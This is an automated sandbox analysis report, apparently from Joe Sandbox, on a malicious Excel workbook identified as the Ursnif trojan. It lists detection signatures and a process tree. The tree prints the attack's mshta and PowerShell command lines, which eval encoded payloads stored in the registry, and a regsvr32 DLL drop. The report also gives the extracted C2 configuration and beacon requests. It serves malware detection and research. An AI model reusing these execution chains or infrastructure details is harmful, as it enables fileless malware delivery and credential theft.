Loading ...

Play interactive tourEdit tour

Windows Analysis Report documentation_39236.xlsb

Overview

General Information

Sample Name:documentation_39236.xlsb
Analysis ID:445916
MD5:31ed7b3f7d7173afe801858e30c0fb62
SHA1:40376b923682dc858806071f97cb64f781142dbb
SHA256:8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Sigma detected: Office product drops executable at suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5056 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 2576 cmdline: regsvr32 -s C:\Users\Public\Documents\decrypt.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5236 cmdline: regsvr32 -s C:\Users\Public\Documents\decrypt.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5008 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4700 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5500 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5944 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1720 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 3128 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3936 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 5780 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1364 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              19.3.regsvr32.exe.56b94a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security
                3.3.regsvr32.exe.4d894a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Encoded IEXShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936
                  Sigma detected: MSHTA Spawning Windows ShellShow sources
                  Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936
                  Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                  Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, CommandLine: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5056, ProcessCommandLine: regsvr32 -s C:\Users\Public\Documents\decrypt.dll, ProcessId: 2576
                  Sigma detected: Mshta Spawning Windows ShellShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936
                  Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3936, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline', ProcessId: 5304
                  Sigma detected: Non Interactive PowerShellShow sources
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3128, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 3936

                  Data Obfuscation:

                  barindex
                  Sigma detected: Office product drops executable at suspicious locationShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ProcessId: 5056, TargetFilename: C:\Users\Public\Documents\decrypt.dll

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000003.00000003.266469751.0000000000530000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: gtr.antoinfer.comVirustotal: Detection: 7%Perma Link
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: unknownHTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2
                  Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
                  Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
                  Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

                  Software Vulnerabilities:

                  barindex
                  Document exploit detected (creates forbidden files)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\Documents\decrypt.dllJump to behavior
                  Document exploit detected (drops PE files)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: app[1].dll.1.drJump to dropped file
                  Document exploit detected (UrlDownloadToFile)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
                  Document exploit detected (process start blacklist hit)Show sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49757 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49757 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49760 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49762 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49761 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49761 -> 165.232.183.49:80
                  Source: Joe Sandbox ViewASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
